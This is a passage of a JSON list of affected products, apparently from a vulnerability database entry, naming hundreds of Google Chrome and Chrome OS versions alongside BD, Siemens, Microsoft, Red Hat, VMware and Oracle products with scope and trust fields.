"23.0.1271.8" }, { "model": "pyxis parx", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.150" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.230" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.67" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.172" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.942.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.50" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.128" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.720.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.904.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.212" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.500.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.116" }, { "model": "pyxis nursing data collection", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.22" }, { "model": "security analytics", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1659.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1052.0" }, { "model": "content analysis", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.305.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.89" }, { "model": "data innovations", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1034" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.145" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.646.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.911.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.697.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.222" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.593.0" }, { "model": "sql server for 32-bit systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "200840" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.20" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.339.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1060.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.626.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1031.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.80" }, { "model": "facslyric", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.37" }, { "model": "facscanto 10-color", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.708.0" }, { "model": null, "scope": "eq", "trust": 0.3, "vendor": "google", "version": "v80" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.161" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.559.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.625.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1009.0" }, { "model": "facsduet sample prep", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.680.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.326" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1062.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.203" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.659.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.881.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.800.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.37599" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.330.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1001" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1056" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.33" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.768.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.82" }, { "model": "windows server for itanium-based systems sp2", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "2008" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.871.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1010.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.31" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.10.140.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1304.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.670.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.378.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.551.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.0" }, { "model": "sinumerik d sl ncu720.3", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "840" }, { "model": "sinumerik panels wtih integrated tcu", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1037" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.2" }, { "model": "pyxis parassist system", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "50.0.2661.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1060" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.611.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.547.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.300.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.509.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.387.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.382.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.290.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.33" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.386.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1056.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1670.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.839.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1277.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.38" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.764.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.616.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.66" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.82" }, { "model": "enterprise linux for power big endian", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "45.0.2454" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.564.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1046" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.50" }, { "model": "sql server for 32-bit systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "201420" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1081.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.868.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.19" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.9.126.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.220" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.42" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.397.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.70" }, { "model": "enterprise linux for power big endian extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.99" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.50" }, { "model": "sql server for x64-based systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "201420" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.491.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1054.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.535.1" }, { "model": "enterprise linux server year extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-47.2" }, { "model": "enterprise linux for scientific computing", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1289.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "53.0.2785.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.825.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.814.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.600.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.566.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.132" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.137" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "50.0.2661.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.877.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.860.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.475.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1070.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.958.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.1.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.94" }, { "model": "simatic ipc847c", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.415.1" }, { "model": "enterprise linux eus compute node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.108" }, { "model": "simatic itp1000", "scope": "ne", "trust": 0.3, "vendor": "siemens", "version": "v23.01.03" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1020.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.614.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.57" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.344.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.34" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.235" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.156.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.111" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.715.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.55" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", 